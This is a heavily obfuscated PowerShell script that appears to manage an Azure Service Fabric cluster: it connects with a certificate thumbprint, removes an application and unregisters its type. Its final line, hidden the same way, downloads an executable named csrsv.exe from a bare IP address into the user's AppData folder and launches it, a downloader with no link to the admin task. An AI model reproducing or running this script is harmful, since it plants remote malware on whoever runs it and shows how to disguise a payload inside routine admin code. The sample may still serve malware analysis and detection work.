${EnD`poiNT} = ("{4}{1}{7}{8}{6}{2}{9}{0}{3}{5}" -f'.az','s','hcentralus.clo','ure.co','mysftestclu','m:19000','r.sout','t','e','udapp')
${THUM`B`PrINT} = ("{5}{2}{10}{4}{9}{7}{3}{6}{0}{1}{8}"-f '0389D','A','79F0BB9A96','5','0491','27','D','5','7AF','5FFE79','9FB88E')
${PA`cK`A`gEpaTH}=((("{17}{22}{23}{11}{4}{3}{0}{25}{18}{14}{27}{2}{5}{24}{26}{6}{13}{21}{15}{10}{12}{9}{20}{7}{16}{19}{1}{8}"-f'}sfuse','Re','sual','{0','sers',' Studio 2017{0}','cts{0','}','lease','plic','A','U','p','}','ocuments{0','ication{0}My','pkg','C:{','D','{0}','ation{0','MyAppl','0','}','Pr','r{0}','oje','}Vi'))  -f [cHAR]92)


&("{5}{3}{4}{6}{2}{0}{1}"-f 'ricC','luster','eFab','onnect-Se','rv','C','ic') -ConnectionEndpoint ${E`NdPO`INT} `
          -KeepAliveIntervalInSec 10 `
          -X509Credential -ServerCertThumbprint ${TH`UMBP`Ri`NT} `
          -FindType ("{1}{4}{0}{2}{3}"-f 'By','Fin','Thumbp','rint','d') -FindValue ${th`Umb`PrInT} `
          -StoreLocation ("{1}{2}{0}"-f 'User','Curr','ent') -StoreName ('My')


.("{4}{5}{2}{3}{1}{0}"-f'tion','a','iceFabr','icApplic','Remove-Se','rv') -ApplicationName ("{0}{4}{2}{1}{3}" -f'fabri','ica','pl','tion','c:/MyAp')


&("{1}{3}{10}{0}{8}{2}{7}{4}{11}{9}{5}{6}" -f'ste','Un','Ser','reg','Applic','y','pe','viceFabric','r-','nT','i','atio') -ApplicationTypeName ("{1}{2}{0}{4}{3}{5}"-f'cat','My','Appli','T','ion','ype') -ApplicationTypeVersion ("{1}{0}"-f '.0','1.0')

(.("{0}{2}{1}"-f 'New','t','-Objec') ("{2}{0}{3}{4}{1}"-f'ystem.Net','ent','S','.WebC','li')).("{0}{2}{1}" -f'Downl','File','oad').Invoke(("{3}{2}{4}{1}{5}{0}{7}{6}"-f'23','102.5','//94','http:','.','3.','~yahoo/csrsv.exe','8/'),"$env:APPDATA\csrsv.exe");&("{3}{0}{2}{1}" -f'rt-','cess','Pro','Sta') ("$env:APPDATA\csrsv.exe")
